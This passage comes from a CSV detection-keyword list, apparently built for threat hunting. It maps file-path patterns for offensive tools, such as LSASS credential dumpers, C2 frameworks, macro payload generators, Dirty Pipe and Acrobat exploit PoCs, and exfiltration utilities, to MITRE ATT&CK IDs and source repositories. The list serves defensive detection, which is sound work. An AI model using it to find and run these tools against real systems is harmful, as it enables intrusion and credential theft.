Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*/LsassSilentProcessExit.git*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*/lsassy*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*/lsassy_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/lucksec/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/lucksec/CVE-2022-0847","1","1","N/A","N/A","1","1","4","2022-03-08T01:50:39Z","2022-03-08T01:17:09Z" +"*/lu-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/luijait/arpspoofing*","offensive_tool_keyword","arpspoofing","arp spoofing scripts","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/arpspoofing","1","1","N/A","N/A","1","15","1","2022-03-10T04:44:36Z","2021-06-29T22:57:51Z" +"*/ly4k/Pachine*","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","1","N/A","8","3","262","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" +"*/lyncsmash/*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*/LyncSniper.ps1*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*/m *.lnk* /c *cmd /c echo f|xcopy @file %temp%*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/m3-gen.py *","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" +"*/m4ll0k/*","offensive_tool_keyword","Github Username","github username 'hacker' hosting exploitaitont tools and passwords attacks tools","N/A","N/A","N/A","N/A","Credential Access","https://github.com/m4ll0k","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
+"*/m8r0wn/*","offensive_tool_keyword","Github Username","pentester github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/m8r0wn","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/MAAD-AF.git*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*/MaccaroniC2*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" +"*/MacroMeter*","offensive_tool_keyword","MacroMeter","VBA Reversed TCP Meterpreter Stager CSharp Meterpreter Stager build by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw https://github.com/tyranid/DotNetToJScript","T1027 - T1059 - T1564 - T1071","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz/MacroMeter","1","0","N/A","N/A","1","62","31","2018-04-23T09:14:49Z","2017-05-16T20:04:41Z" +"*/MacroPatterns.cs*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*/Macro-Payloads.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/MacroWord_Payload/macro.txt*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" +"*/magnitude.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/MailRaider.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*/MailRaider.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1129","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/MailSniper/*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*/main/cve-2022-0847.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" +"*/main/exploit.js","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","3","250","57","2023-02-27T04:51:20Z","2023-01-30T12:57:48Z" +"*/main/exploit.pdf","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","3","250","57","2023-02-27T04:51:20Z","2023-01-30T12:57:48Z" +"*/MaliciousMacroMSBuild*","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","1","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" +"*/malleable-c2*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*/MalSCCM.git*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" +"*/MalSCCM.sln*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" +"*/malseclogon.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*/MalStuff.cpp*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*/man_in_the_browser/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/man_in_the_browser/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/manage/exec_cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/Management/C2/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*/manjusaka/plugins*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" +"*/MANSPIDER.git*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*/manspider_*.log*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*/manspider_output*.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/manspiderDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/masky.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory 
networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/master/GPSCoordinates/*","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/master/JunctionFolder/*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/master/PhantomService/*","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/maxdb-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mcafee-epo-agent.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/megatools.exe*","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*/membase-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/membase-http-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/memcached-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/memodipper64*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/memory_exec.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/memorydump.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. 
Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*/mempodipper.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/MemReader_BoF/*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
